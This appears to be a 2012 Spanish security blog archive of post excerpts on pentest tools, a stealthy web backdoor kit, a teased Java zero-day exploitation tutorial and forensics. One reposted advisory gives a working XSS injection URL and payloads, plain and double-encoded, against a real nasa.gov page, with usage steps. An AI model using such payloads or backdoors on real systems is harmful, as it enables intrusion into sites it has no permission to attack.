viernes, 31 de agosto de 2012

WordPress y Algunas de sus Vulnerabilidades


WordPress  ¿Qué es?

WordPress es un sistema de gestión de contenido (en inglés Content Management System, o CMS) enfocado a la creación de blogs (sitios web periódicamente actualizados). Desarrollado en PHP y MySQL, bajo licencia GPL y código modificable. WordPress se ha convertido junto a Movable Type en el CMS más popular de la blogosfera y en el más popular con respecto a cualquier otro CMS de aplicación general. Las causas de su enorme crecimiento son, entre otras, su licencia, su facilidad de uso y sus características como gestor de contenidos.

jueves, 30 de agosto de 2012

Backdorizando Servidores Web con WeBaCoo



WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).

WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.

En muchos casos, esta herramienta es muy usada cuando un servidor no tiene instalado el Netcat.

miércoles, 29 de agosto de 2012

Explotando Vulnerabilidad 0day en Java7 - Exploit .JAR


Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

lunes, 27 de agosto de 2012

Comandos Avanzados de Nmap


Nmap (Network Mapper), es una herramienta open source, diseñada para explorar y para realizar auditorias de seguridad en una red de computadoras.

Esta herramienta es muy usada por los Pentesters cuando realizan  Pruebas de Penetración.

Nmap, es sin duda, y no por que sea el único, el primer scanner usado por excelencia por la mayoría de los especialistas para el reconocimiento de una pc o una red y esta disponible tanto para Windows como para GNU-Linux. 

Ahora bien, en esta entrada les dejare una pequeña lista sobre los comandos mas avanzados y usados para poder llevar a cabo una buena Prueba de Penetración.

Empecemos.

sábado, 25 de agosto de 2012

[EXPLOITS] Aplicaciones y Sistemas Web



Pequeña lista de Exploits disponibles para varias aplicaciones web y sistemas de gestión de contenidos (CMS), tales como Joomla, Wordpress, Drupal.

El fin de esta entrada es ayudar a los webmasters y administradores de sistemas en la protección de sus sitios web y sistemas contra vulnerabilidades.

jueves, 23 de agosto de 2012

Cross Site Scripting NASA.GOV



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                              1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent            |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor : NASA
# Category : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on   : BackTrack 5 r3 - Mozilla Firefox
# Contact      : calebbucker@gmail.com
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:

http://img341.imageshack.us/img341/4395/snapshot408.png

http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VULNERABILITY LOCATION:

www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CROSS SITE SCRIPTING:

www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert
('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527
CalebBucker%2527%2529%253C%252fscript%253E

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOW TO USE:

"><script>alert('XSS")</script> send it through, works on GET nothing else
is really special about it.

so double encoded it will look like this:

%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy!

# 1337day.com [2012-08-22]

miércoles, 22 de agosto de 2012

[ANÁLISIS FORENSE] Extracción Metadatos GPS de Fotografias


En esta entrada, mostraré cómo extraer los Metadatos de las Fotografías para saber el lugar exacto de ubicación donde se tomo la Fotografía.

Hay que tener en cuenta que no todas las Fotografías tienen datos GPS. La mayoría de las fotos que existen con estos datos, son tomadas desde teléfonos inteligentes y/o cámaras de ultima generación. 

Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.

También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS del momento, fecha, hora, ubicación, nombre de la cámara, fecha de edición si la imagen ha sido editada y todas las demás opciones puestas en ella, llegando así a obtener un resultado real.

martes, 21 de agosto de 2012

EC-Council - Certified Ethical Hacker v7: Videos - Herramientas - Tutoriales




Certified Ethical Hacker v7 proporciona un exhaustivo red de programas de Hacking Ético y Seguridad para cumplir con los estándares de los profesionales de seguridad altamente calificados. 

Cientos de SMEs y autores han contribuido al contenido que se presenta en el material pedagógico Certified Ethical Hacker v7

Las últimas herramientas y Exploits descubiertos de la comunidad Underground se ofrecen en este paquete

Estos DVD-ROM es solamente para investigación y propósitos educativos. El objetivo principal de estos DVD-ROM es proporcionar al usuario contenido para Investigación en Educación o el ser relevante para la seguridad de red y los distintos métodos de protección y sus defectos intrínsecos mediante la demostración de métodos de exploits y técnicas.

lunes, 20 de agosto de 2012

Web Shell Detector




Web Shell Detector es un script programado en  PHP que ayuda a encontrar e identificar shells en  nuestros sitios webs y en diferentes extensiones como son: php/cgi - perl - asp y aspx.


Web Shell Detector tiene una base de datos de "web shells"  que permite identificar las "web shells" en un 99% mediante el uso de las últimas tecnologías de Javascript y css.

jueves, 16 de agosto de 2012

Smartphone Pentest Framework - BackTrack 5 r3



En la reciente BlackHat Vegas, se presento una herramienta llamada Smartphone Pentest Framework en la cual para muchas personas les sonó muy interesante porque facilmente permite realizar Pruebas de Penetración hacia los Smartphone mas conocidos como es el Android, Iphone entre muchos otros que se suman a la lista de los Teléfonos Inteligentes.

Veamos un poco mas sobre esta herramienta.

El Smartphone Penetration Testing Framework, es el resultado de un proyecto de DARPA Cyber ​​Fast Track que tiene como objetivo proporcionar un conjunto de herramientas de código abierto que aborda las múltiples facetas de la evaluación de la postura de seguridad de estos dispositivos.

martes, 14 de agosto de 2012

Secuestrando Cookies [Fern Wifi Cracker Cookie Hijacker Wirelles]



Para aquellos que todavía no saben... Fern es la interfaz gráfica de AirCrak-NG, un software escrito en Python y más allá de ofrecer un apoyo valioso para el craqueo de redes WEP y WPA/WPA2 es capaz de localizar una red inalámbrica utilizando la API de Google Maps y ha presentado recientemente la última versión 1.6 que tiene la funcionalidad de Cookie Hijacker Wireless!

lunes, 13 de agosto de 2012

Lanzamiento Oficial de BackTrack 5 R3



BackTrack 5 R3 ha sido puesto en libertad, la version R3 se centra en la correcciones de errores, así como la adición de más de 60 nuevas herramientas - varios de los cuales fueron puestos en libertad en el BlackHat y la Defcon 2012. Toda una categoría nueva herramienta - “Physical Exploitation”, que ahora incluye herramientas tales como el IDE de Arduino y bibliotecas, así como la recolección de Kautilya Teensy payload collection.

Construir, probar y lanzar una nueva revisión de BackTrack no es nunca una tarea fácil. Mantenerse al día con las últimas herramientas, mientras que equilibrar sus requerimientos de las dependencias, se asemeja a un acto de magia, malabarismo espectáculo. Afortunadamente, los miembros activos de nuestra Comunidad Redmine como backtracklover JudasIscariot y hacer que nuestra tarea sea mucho más fácil activamente reportando errores y sugiriendo nuevas herramientas sobre una base regular. Me quito el sombrero a la dos.

sábado, 11 de agosto de 2012

Cuckoo Sandbox: Análisis de Malware - Crimeware



Cuckoo Sandbox es un software de código abierto para la automatización de análisis de archivos sospechosos, como actualmente son los Malware y Crimeware que afectan mucho a los sistemas Financieros.

Para ello Cuckoo hace uso de componentes personalizados que monitorean el comportamiento de los procesos maliciosos mientras se ejecuta en un entorno aislado.

jueves, 9 de agosto de 2012

Nessus: Plugin para "Auditar Dispositivos Móviles"




La Tenable Network Security ha lanzado recientemente en su versión beta, los plug-ins de Auditoria para Dispositivos Móviles en la plataforma de  Nessus. 


Nessus se integra ahora con Apple® Profile Manager y Microsoft® Exchange con Active Directory® para enumerar rápidamente iOS y Android™ que accedan a la red corporativa y encontrar información sobre el dispositivo como tambien detectar las vulnerabilidades de los móviles.

miércoles, 8 de agosto de 2012

TheHarvester: Recopilacion de Datos




TheHarvester es una herramienta para recopilar cuentas de correo electrónico, nombres de usuario y nombres de host o subdominios de diferentes fuentes públicas como motores de búsqueda y los servidores de claves PGP.

Esta herramienta está destinada a ayudar a los probadores de penetración en las primeras etapas del proyecto, es una herramienta muy simple, pero muy eficaz.

Netifera Network Mapping



NETIFERA es una nueva plataforma modular de código abierto para la creación de herramientas de seguridad de red. 

Este proyecto ofrece muchas ventajas para los desarrolladores de seguridad y los investigadores que desean implementar nuevas herramientas, así como la comunidad de usuarios de estas herramientas.

Esta versión inicial incluye un conjunto completo de herramientas de RED para la recolección de información:

lunes, 6 de agosto de 2012

Actualización: WebSploit Framework v-2.0.1



WebSploit ha lanzado su nueva versión 2.0.1 en la cual han agregado muchas mas características con la que podremos auditar y facilitar el trabajo cuando realizamos las pruebas de penetración.

Como ya sabemos, esta herramienta es muy parecida al Metasploit y se actualiza muchas veces agregando nuevas herramientas como son los Scanners, Fuzzers y Crawlers.

Esta herramienta contiene lo siguiente:

domingo, 5 de agosto de 2012

The Samurai Web Testing Framework v 2.0RC5


Los creadores de la distro "The Samurai Web Testing Framework" han actualizado su distro a la versión 2.0RC5, en la cual indican lo siguiente:

The Samurai Web Testing Framework es un entorno de Linux que ha sido pre-configurado para funcionar como una red de pruebas de penetración.

El CD contiene lo mejor de la fuente abierta y herramientas gratuitas que se centran en probar y atacar sitios web.